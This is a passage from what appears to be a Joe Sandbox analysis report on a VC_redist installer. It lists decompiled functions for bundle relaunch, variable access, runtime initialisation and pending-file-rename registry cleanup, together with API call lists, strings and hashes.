                                                                          0x000531a5
                                                                          0x000531ac
                                                                          0x000531b4
                                                                          0x000531b7
                                                                          0x000531b7
                                                                          0x000531c4

                                                                          APIs
                                                                          • SysAllocString.OLEAUT32(?), ref: 0005312C
                                                                          • VariantInit.OLEAUT32(?), ref: 00053138
                                                                          • VariantClear.OLEAUT32(?), ref: 000531AC
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000531B7
                                                                            • Part of subcall function 0005336E: SysAllocString.OLEAUT32(?), ref: 00053383
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocVariant$ClearFreeInit
                                                                          • String ID:
                                                                          • API String ID: 347726874-0
                                                                          • Opcode ID: f52d487ca9587826075b9da1b93bfbea2e6d79c1c4fe099a709b7c9fd0da60de
                                                                          • Instruction ID: 5aee7e4bc266169cbe51f3bd9e8ce8746018c23744ce8877458db0545440cb17
                                                                          • Opcode Fuzzy Hash: f52d487ca9587826075b9da1b93bfbea2e6d79c1c4fe099a709b7c9fd0da60de
                                                                          • Instruction Fuzzy Hash: 8C213D35901619AFCB14DFA5C848EAFBBF8AF44752F14015CED01A7220DB31AE09CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00014B80 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 65%
                                                                          			E00014B80(void* __ecx, intOrPtr _a4, short _a8) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _t38;

				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_t38 = E0001F7F7(__ecx, _a4,  &_v8);
				if(_t38 >= 0) {
					_t38 = E000133D7( &_v12, 0);
					if(_t38 >= 0) {
						_t26 =  >  ? _v8 : 0x5b524;
						_t38 = E0005082D(_v12,  >  ? _v8 : 0x5b524, _a8,  &_v16);
						if(_t38 < 0) {
							E0005012F(_t38, "Failed to re-launch bundle process after RunOnce: %ls", _v12);
						}
						L7:
						if(_v16 != 0) {
							CloseHandle(_v16);
							_v16 = 0;
						}
						if(_v8 != 0) {
							E000554EF(_v8);
						}
						if(_v12 != 0) {
							E000554EF(_v12);
						}
						return _t38;
					}
					_push("Failed to get current process path.");
					L2:
					_push(_t38);
					E0005012F();
					goto L7;
				}
				_push("Unable to get resume command line from the registry");
				goto L2;
			}







                                                                          0x00014b91
                                                                          0x00014b94
                                                                          0x00014b97
                                                                          0x00014b9f
                                                                          0x00014ba3
                                                                          0x00014bbe
                                                                          0x00014bc2
                                                                          0x00014bda
                                                                          0x00014be7
                                                                          0x00014beb
                                                                          0x00014bf6
                                                                          0x00014bfb
                                                                          0x00014bfe
                                                                          0x00014c01
                                                                          0x00014c06
                                                                          0x00014c0c
                                                                          0x00014c0c
                                                                          0x00014c12
                                                                          0x00014c17
                                                                          0x00014c17
                                                                          0x00014c1f
                                                                          0x00014c24
                                                                          0x00014c24
                                                                          0x00014c30
                                                                          0x00014c30
                                                                          0x00014bc4
                                                                          0x00014baa
                                                                          0x00014baa
                                                                          0x00014bab
                                                                          0x00000000
                                                                          0x00014bb1
                                                                          0x00014ba5
                                                                          0x00000000

                                                                          APIs
                                                                            • Part of subcall function 0001F7F7: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00014B9F,?,?,00000001), ref: 0001F847
                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00014C06
                                                                            • Part of subcall function 0005082D: CreateProcessW.KERNEL32 ref: 0005089A
                                                                            • Part of subcall function 0005082D: GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 000508A4
                                                                            • Part of subcall function 0005082D: CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 000508ED
                                                                            • Part of subcall function 0005082D: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 000508FA
                                                                          Strings
                                                                          • Unable to get resume command line from the registry, xrefs: 00014BA5
                                                                          • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00014BF0
                                                                          • Failed to get current process path., xrefs: 00014BC4
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close$Handle$CreateErrorLastProcess
                                                                          • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                                          • API String ID: 1572399834-642631345
                                                                          • Opcode ID: e6f6585edfd8ccf36f0e912e06a784c72c0f85a76fbae06017c0bf854b81ff15
                                                                          • Instruction ID: 9acc5e1d2f9f02a3f31e817d7a644598d687b1e8bc620f48ab7d4ed1afd67b04
                                                                          • Opcode Fuzzy Hash: e6f6585edfd8ccf36f0e912e06a784c72c0f85a76fbae06017c0bf854b81ff15
                                                                          • Instruction Fuzzy Hash: 07117C76D05619FBCF22AB94DD41CEEFBB8EF40712B1041A6FD00A6221DB319A849B81
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000460E2 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 82%
                                                                          			E000460E2(void* __ecx) {
				void* __ebx;
				void* __edi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t15;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x7a05c; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E0004523F(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E000488AE(_t10, _t13, _t16, __eflags,  *0x7a05c, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00045ED0(_t13, _t16, 0x7b13c);
							E0004511A(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E0004511A();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00048858(0, _t11, _t15, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}













                                                                          0x000460e2
                                                                          0x000460ed
                                                                          0x000460ef
                                                                          0x000460f1
                                                                          0x000460f6
                                                                          0x000460f9
                                                                          0x00046107
                                                                          0x00046113
                                                                          0x00046116
                                                                          0x00046119
                                                                          0x0004612b
                                                                          0x00046130
                                                                          0x00046132
                                                                          0x0004613d
                                                                          0x00046143
                                                                          0x0004614b
                                                                          0x0004614d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046134
                                                                          0x00046134
                                                                          0x00000000
                                                                          0x00046134
                                                                          0x0004611b
                                                                          0x0004611b
                                                                          0x0004611c
                                                                          0x0004611c
                                                                          0x0004614f
                                                                          0x00046150
                                                                          0x00046150
                                                                          0x000460fb
                                                                          0x00046101
                                                                          0x00046105
                                                                          0x00046158
                                                                          0x00046159
                                                                          0x0004615f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00046105
                                                                          0x00046166

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000100,00000000,00043E3B,000316CE,80004005,00000000,?,cabextract.cpp,000001C7), ref: 000460E7
                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00046150
                                                                          • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 00046159
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: @Met
                                                                          • API String ID: 1452528299-2381362037
                                                                          • Opcode ID: 718519052ace20ff84832b3c24cd9ca005332134bf6d1fa2f88d6fad74033453
                                                                          • Instruction ID: 56532fc4755e028f436a755daa70371550ac8bb6afb28d1f226a6755763bd308
                                                                          • Opcode Fuzzy Hash: 718519052ace20ff84832b3c24cd9ca005332134bf6d1fa2f88d6fad74033453
                                                                          • Instruction Fuzzy Hash: E401F9F6600B0067971127346C46D6F369D9BD3772B280939F519A22A3FF2A8C05417E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0001730C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 34%
                                                                          			E0001730C(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t15;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				EnterCriticalSection(_a4);
				_t22 = E00015C87(_t20, _a4, _a8,  &_v8);
				_t15 = _v8;
				if(_t22 < 0 ||  *((intOrPtr*)(_t15 + 0x18)) != 0) {
					if(_t22 != 0x80070490) {
						if(_t22 >= 0) {
							_t22 = E0003006A(_t20, _t15 + 8, _a12);
							if(_t22 < 0) {
								_push(_a8);
								_push("Failed to get value as numeric for variable: %ls");
								goto L8;
							}
						} else {
							_push(_a8);
							_push("Failed to get value of variable: %ls");
							L8:
							_push(_t22);
							E0005012F();
						}
					}
				} else {
					_t22 = 0x80070490;
				}
				LeaveCriticalSection(_a4);
				return _t22;
			}






                                                                          0x0001730c
                                                                          0x0001730f
                                                                          0x00017310
                                                                          0x00017318
                                                                          0x0001732d
                                                                          0x0001732f
                                                                          0x00017334
                                                                          0x00017349
                                                                          0x0001734d
                                                                          0x00017365
                                                                          0x00017369
                                                                          0x0001736b
                                                                          0x0001736e
                                                                          0x00000000
                                                                          0x0001736e
                                                                          0x0001734f
                                                                          0x0001734f
                                                                          0x00017352
                                                                          0x00017373
                                                                          0x00017373
                                                                          0x00017374
                                                                          0x00017379
                                                                          0x0001734d
                                                                          0x0001733c
                                                                          0x0001733c
                                                                          0x0001733c
                                                                          0x0001737f
                                                                          0x0001738b

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 00017318
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0001737F
                                                                          Strings
                                                                          • Failed to get value of variable: %ls, xrefs: 00017352
                                                                          • Failed to get value as numeric for variable: %ls, xrefs: 0001736E
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                                          • API String ID: 3168844106-4270472870
                                                                          • Opcode ID: 7b3da6e6f136f165c81b4c6f8ce2226bbf9128544a519cecff07217f57a601cb
                                                                          • Instruction ID: d29b4cf6971950aeffef56b42bcdd3e65512823e9da89546667ecee548cb7380
                                                                          • Opcode Fuzzy Hash: 7b3da6e6f136f165c81b4c6f8ce2226bbf9128544a519cecff07217f57a601cb
                                                                          • Instruction Fuzzy Hash: FF017C72945228FBCF265F54CC05ADE3B79EB04722F008125FD18AA221C3369FA0ABD4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00017481 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 38%
                                                                          			E00017481(void* __ecx, void* __edx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t15;
				void* _t21;
				void* _t23;

				_t21 = __edx;
				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				EnterCriticalSection(_a4);
				_t23 = E00015C87(_t20, _a4, _a8,  &_v8);
				_t15 = _v8;
				if(_t23 < 0 ||  *((intOrPtr*)(_t15 + 0x18)) != 0) {
					if(_t23 != 0x80070490) {
						if(_t23 >= 0) {
							_t23 = E000301D0(_t20, _t21, _t15 + 8, _a12);
							if(_t23 < 0) {
								_push(_a8);
								_push("Failed to get value as version for variable: %ls");
								goto L8;
							}
						} else {
							_push(_a8);
							_push("Failed to get value of variable: %ls");
							L8:
							_push(_t23);
							E0005012F();
						}
					}
				} else {
					_t23 = 0x80070490;
				}
				LeaveCriticalSection(_a4);
				return _t23;
			}







                                                                          0x00017481
                                                                          0x00017481
                                                                          0x00017484
                                                                          0x00017485
                                                                          0x0001748d
                                                                          0x000174a2
                                                                          0x000174a4
                                                                          0x000174a9
                                                                          0x000174be
                                                                          0x000174c2
                                                                          0x000174da
                                                                          0x000174de
                                                                          0x000174e0
                                                                          0x000174e3
                                                                          0x00000000
                                                                          0x000174e3
                                                                          0x000174c4
                                                                          0x000174c4
                                                                          0x000174c7
                                                                          0x000174e8
                                                                          0x000174e8
                                                                          0x000174e9
                                                                          0x000174ee
                                                                          0x000174c2
                                                                          0x000174b1
                                                                          0x000174b1
                                                                          0x000174b1
                                                                          0x000174f4
                                                                          0x00017500

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0001748D
                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 000174F4
                                                                          Strings
                                                                          • Failed to get value of variable: %ls, xrefs: 000174C7
                                                                          • Failed to get value as version for variable: %ls, xrefs: 000174E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                          • API String ID: 3168844106-1851729331
                                                                          • Opcode ID: f05a462bf445a448a2a1b882421d0341e596019888e6afebf7fac740ea0dac46
                                                                          • Instruction ID: 8d7623867c537f06df94514236d5c22bb4b0e3e0e55875a5b41f53f23eab5929
                                                                          • Opcode Fuzzy Hash: f05a462bf445a448a2a1b882421d0341e596019888e6afebf7fac740ea0dac46
                                                                          • Instruction Fuzzy Hash: 54017C32985229FFDF225F44CC05ADE3F78AB14722F108125FD08AA221C73A9E9097E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00017410 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 31%
                                                                          			E00017410(void* __ecx, void* __edx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t20;
				void* _t22;

				_t20 = __edx;
				_t19 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				EnterCriticalSection(_a4);
				_t22 = E00015C87(_t19, _a4, _a8,  &_v8);
				if(_t22 != 0x80070490) {
					if(_t22 >= 0) {
						_t22 = E0002FF73(_t20, _v8 + 8, _a12);
						if(_t22 < 0) {
							_push(_a8);
							_push("Failed to copy value of variable: %ls");
							goto L5;
						}
					} else {
						_push(_a8);
						_push("Failed to get value of variable: %ls");
						L5:
						_push(_t22);
						E0005012F();
					}
				}
				LeaveCriticalSection(_a4);
				return _t22;
			}






                                                                          0x00017410
                                                                          0x00017410
                                                                          0x00017413
                                                                          0x00017414
                                                                          0x0001741c
                                                                          0x00017431
                                                                          0x00017439
                                                                          0x0001743d
                                                                          0x00017458
                                                                          0x0001745c
                                                                          0x0001745e
                                                                          0x00017461
                                                                          0x00000000
                                                                          0x00017461
                                                                          0x0001743f
                                                                          0x0001743f
                                                                          0x00017442
                                                                          0x00017466
                                                                          0x00017466
                                                                          0x00017467
                                                                          0x0001746c
                                                                          0x0001743d
                                                                          0x00017472
                                                                          0x0001747e

                                                                          APIs
                                                                          • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00019752,00000000,?,00000000,00000000,00000000,?,00019590,00000000,?,00000000,00000000), ref: 0001741C
                                                                          • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00019752,00000000,?,00000000,00000000,00000000,?,00019590,00000000,?,00000000), ref: 00017472
                                                                          Strings
                                                                          • Failed to get value of variable: %ls, xrefs: 00017442
                                                                          • Failed to copy value of variable: %ls, xrefs: 00017461
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterLeave
                                                                          • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                          • API String ID: 3168844106-2936390398
                                                                          • Opcode ID: e7f72531b16d9599a366430a639e0c1612ee69e75d3c43ff897ad401c255f8ba
                                                                          • Instruction ID: e45fb7379d57f02225b28501199d2d8caeb2c425039cb7572500005116fc76e2
                                                                          • Opcode Fuzzy Hash: e7f72531b16d9599a366430a639e0c1612ee69e75d3c43ff897ad401c255f8ba
                                                                          • Instruction Fuzzy Hash: 97F04F36944629BBCF126F54CC06EDF7F78EF15362F008124FD08AA221D7369A60ABD5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00041246 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00041246() {
				void* _t4;
				void* _t8;

				E00041854();
				E000417E8();
				if(E00041548() != 0) {
					_t4 = E000414FA(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00041584();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                                          0x00041246
                                                                          0x0004124b
                                                                          0x00041257
                                                                          0x0004125c
                                                                          0x00041261
                                                                          0x00041263
                                                                          0x0004126e
                                                                          0x00041265
                                                                          0x00041265
                                                                          0x00000000
                                                                          0x00041265
                                                                          0x00041259
                                                                          0x00041259
                                                                          0x0004125b
                                                                          0x0004125b

                                                                          APIs
                                                                          • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00041246
                                                                          • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0004124B
                                                                          • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00041250
                                                                            • Part of subcall function 00041548: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00041559
                                                                          • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00041265
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                          • String ID:
                                                                          • API String ID: 1761009282-0
                                                                          • Opcode ID: 294756368ebb91e0d837f8d85631f380e5f2af2aa371e18ba28d844398db2aca
                                                                          • Instruction ID: 0ef7c4576b95a79595dbfaa09ea1c7ccc639484abdf47d01945b0f94fd56fa0a
                                                                          • Opcode Fuzzy Hash: 294756368ebb91e0d837f8d85631f380e5f2af2aa371e18ba28d844398db2aca
                                                                          • Instruction Fuzzy Hash: 1BC04CF8044611A41E6036F163423ED03C50FE238579010F5F866D75435D4A04FB603E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00054661 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136registryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00054661(intOrPtr _a4) {
				char _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				char _v24;
				signed short* _t64;
				intOrPtr _t65;
				intOrPtr _t67;
				signed int _t78;
				signed int _t79;
				signed int _t80;
				void* _t82;
				intOrPtr _t83;
				signed int _t84;
				void* _t85;
				signed int _t86;

				_t86 = 0;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v24 = 0;
				_v20 = 0;
				_t84 = E00050E3F(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager", 3,  &_v16);
				if(_t84 != 0x80070002) {
					if(_t84 >= 0) {
						_t84 = E000510C5(_v16, L"PendingFileRenameOperations",  &_v8,  &_v12);
						if(_t84 == 0x80070002) {
							goto L1;
						} else {
							if(_t84 >= 0) {
								_t78 = 0;
								if(_v12 > 0) {
									_t82 = 0x3f;
									do {
										_t64 =  *(_v8 + _t78 * 4);
										if(_t64 == 0) {
											L21:
											_t65 = _v20;
											goto L24;
										} else {
											_t79 =  *_t64 & 0x0000ffff;
											if(_t79 == 0) {
												goto L21;
											} else {
												_t85 = 0x5c;
												if(_t85 == _t79 && _t82 == _t64[1] && _t82 == _t64[2] && _t85 == _t64[3]) {
													_t64 =  &(_t64[4]);
												}
												_t84 = E00012D05( &_v24, _a4, _t64,  &_v24);
												if(_t84 >= 0) {
													if(_v24 != 2) {
														_t65 = _v20;
													} else {
														_t69 = _v8;
														if( *(_v8 + _t78 * 4) != _t86) {
															E000554EF( *((intOrPtr*)(_t69 + _t78 * 4)));
															 *(_v8 + _t78 * 4) = _t86;
														}
														_t71 =  *(_v8 + 4 + _t78 * 4);
														if( *(_v8 + 4 + _t78 * 4) != 0) {
															E000554EF(_t71);
															 *(_v8 + 4 + _t78 * 4) = _t86;
														}
														_t65 = 1;
														_v20 = 1;
													}
													_t82 = 0x3f;
													goto L24;
												}
											}
										}
										goto L31;
										L24:
										_t78 = _t78 + 2;
									} while (_t78 < _v12);
									if(_t65 != 0) {
										_t80 = _t86;
										if(_v12 > _t80) {
											do {
												_t67 = _v8;
												_t83 =  *((intOrPtr*)(_t67 + _t80 * 4));
												if(_t83 != 0) {
													 *((intOrPtr*)(_t67 + _t86 * 4)) = _t83;
													_t86 = _t86 + 1;
												}
												_t80 = _t80 + 1;
											} while (_t80 < _v12);
										}
										_v12 = _t86;
										_t84 = E0005143C(_v16, L"PendingFileRenameOperations", _v8, _t86);
									}
								}
							}
						}
					}
				} else {
					L1:
					_t84 = _t86;
				}
				L31:
				_t56 = _v8;
				if(_v8 != 0) {
					E00012647(_t56, _v12);
				}
				if(_v16 != 0) {
					RegCloseKey(_v16);
				}
				return _t84;
			}



















                                                                          0x0005466d
                                                                          0x0005467c
                                                                          0x0005467f
                                                                          0x00054682
                                                                          0x00054685
                                                                          0x00054688
                                                                          0x00054690
                                                                          0x00054699
                                                                          0x000546a4
                                                                          0x000546bf
                                                                          0x000546c3
                                                                          0x00000000
                                                                          0x000546c5
                                                                          0x000546c7
                                                                          0x000546cd
                                                                          0x000546d2
                                                                          0x000546da
                                                                          0x000546db
                                                                          0x000546de
                                                                          0x000546e3
                                                                          0x0005475d
                                                                          0x0005475d
                                                                          0x00000000
                                                                          0x000546e5
                                                                          0x000546e5
                                                                          0x000546eb
                                                                          0x00000000
                                                                          0x000546ed
                                                                          0x000546ef
                                                                          0x000546f3
                                                                          0x00054707
                                                                          0x00054707
                                                                          0x00054717
                                                                          0x0005471b
                                                                          0x00054725
                                                                          0x00054762
                                                                          0x00054727
                                                                          0x00054727
                                                                          0x0005472d
                                                                          0x00054732
                                                                          0x0005473a
                                                                          0x0005473a
                                                                          0x00054740
                                                                          0x00054746
                                                                          0x00054749
                                                                          0x00054751
                                                                          0x00054751
                                                                          0x00054757
                                                                          0x00054758
                                                                          0x00054758
                                                                          0x00054767
                                                                          0x00000000
                                                                          0x00054767
                                                                          0x0005471b
                                                                          0x000546eb
                                                                          0x00000000
                                                                          0x00054768
                                                                          0x00054768
                                                                          0x0005476b
                                                                          0x00054776
                                                                          0x00054778
                                                                          0x0005477d
                                                                          0x0005477f
                                                                          0x0005477f
                                                                          0x00054782
                                                                          0x00054787
                                                                          0x00054789
                                                                          0x0005478c
                                                                          0x0005478c
                                                                          0x0005478d
                                                                          0x0005478e
                                                                          0x0005477f
                                                                          0x00054797
                                                                          0x000547a7
                                                                          0x000547a7
                                                                          0x00054776
                                                                          0x000546d2
                                                                          0x000546c7
                                                                          0x000546c3
                                                                          0x0005469b
                                                                          0x0005469b
                                                                          0x0005469b
                                                                          0x0005469b
                                                                          0x000547a9
                                                                          0x000547a9
                                                                          0x000547ae
                                                                          0x000547b4
                                                                          0x000547b4
                                                                          0x000547bd
                                                                          0x000547c2
                                                                          0x000547c2
                                                                          0x000547d0

                                                                          APIs
                                                                            • Part of subcall function 00050E3F: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,?,00055699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000,00000000), ref: 00050E52
                                                                          • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 000547C2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
